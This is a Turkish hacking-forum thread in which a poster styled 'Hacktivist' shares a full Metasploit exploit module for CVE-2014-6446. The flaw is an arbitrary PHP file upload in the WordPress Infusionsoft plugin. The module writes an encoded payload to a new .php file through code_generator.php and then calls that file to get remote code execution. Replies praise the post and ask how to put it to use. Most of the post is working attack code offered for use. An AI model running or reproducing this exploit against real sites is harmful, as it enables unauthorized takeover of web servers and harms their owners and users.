Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WordPress InfusionSoft Shell Yükleme Açığı
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 77 / 100
Rep Sayısı: 2734
Mesaj Sayısı: 6276
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
WordPress InfusionSoft Shell Yükleme Açığı
11.04.2015 12:52
Kod:
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity
        Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
        upload and remote code execution.
      },
      'Author'         =>
        [
          'CyBeRizM',                    # Vulnerability Discovery
          'Cyberizm <[email protected]>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-6446'],
          ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
          ['WPVDB', '7634']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
      'DisclosureDate' => 'Sep 25 2014',
      'DefaultTarget'  => 0)
    )
  end

  def check
    res = send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
    )

    if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    res = send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', 'code_generator.php'),
      'method'    => 'POST',
      'vars_post' =>
      {
        'fileNamePattern' => php_pagename,
        'fileTemplate'    => payload.encoded
      }
    })

    if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
      register_files_for_cleanup(php_pagename)
    else
      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
    end

    print_status("#{peer} - Calling payload ...")
    send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', php_pagename)
    }, 2)
  end

end

Bu exploiti Metasploiti kullanabilmek için bunları kurmanız gerekmekte

# This module requires Metasploit: metasploit.com/download
# Current source: github.com/rapid7/metasploit-framework
(Bu konu en son: 11.04.2015 Tarihinde, Saat: 12:53 düzenlenmiştir. Düzenleyen: KingSkrupellos.)
Alinti
sadecesdc
*
avatar
Teğmen - Ex
Durum: Çevrimdışı
Seviye Puanı: 11
Yaşam Puanı: 23 / 257
Deneyim: 30 / 100
Rep Sayısı: 10
Mesaj Sayısı: 150
Üyelik Tarihi: 01.05.2014
     
Yorum: #2
Cvp: WordPress InfusionSoft Shell Yükleme Açığı
11.04.2015 13:02
eline sağlık başkanım Exciting
Alinti
AdiG3
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 6
Yaşam Puanı: 5 / 126
Deneyim: 5 / 100
Rep Sayısı: 0
Mesaj Sayısı: 52
Üyelik Tarihi: 01.04.2015
     
Yorum: #3
Cvp: WordPress InfusionSoft Shell Yükleme Açığı
11.04.2015 13:43
bu acıkla ilgili bir örnek olsaydı bizlerde uygulamaya alabilirdik illaki vardır prolar aramızda önderlik şart
Alinti
Sid3
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 12
Yaşam Puanı: 34 / 288
Deneyim: 54 / 100
Rep Sayısı: 31
Mesaj Sayısı: 182
Üyelik Tarihi: 27.08.2014
     
Yorum: #4
Cvp: WordPress InfusionSoft Shell Yükleme Açığı
11.04.2015 16:53
Yeni başlayanlar hiç denemessin bile metasploiti çözmek bana 2 aya patladı . Smile
Alinti



1 Ziyaretçi